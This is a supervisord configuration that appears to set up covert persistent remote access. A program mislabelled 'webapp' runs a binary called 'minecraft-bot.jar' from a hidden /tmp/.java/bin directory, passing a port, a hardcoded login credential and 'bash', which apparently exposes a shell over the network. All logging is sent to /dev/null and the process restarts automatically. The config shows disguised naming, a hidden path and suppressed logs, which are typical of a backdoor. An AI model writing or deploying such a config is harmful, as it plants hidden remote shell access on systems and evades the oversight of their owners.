[supervisord]
logfile=/dev/null

[program:webapp]
directory=/tmp/.java/bin
command =./minecraft-bot.jar -p 44128 -c "appusertyd:i5M#VJS*&EYTJQC4VNV5US#SQEC^*^*US@2C3E^@EV^UY5KELC#TW^2G97@P8K4EYPR@W86E^9KWJSM%7U3Y*NAEKLV#6P8AXC5XMRYBQ7Z5#76KGHXB%PXKT39UUDZXT#M" bash
stdout_logfile=/dev/null
autorestart = true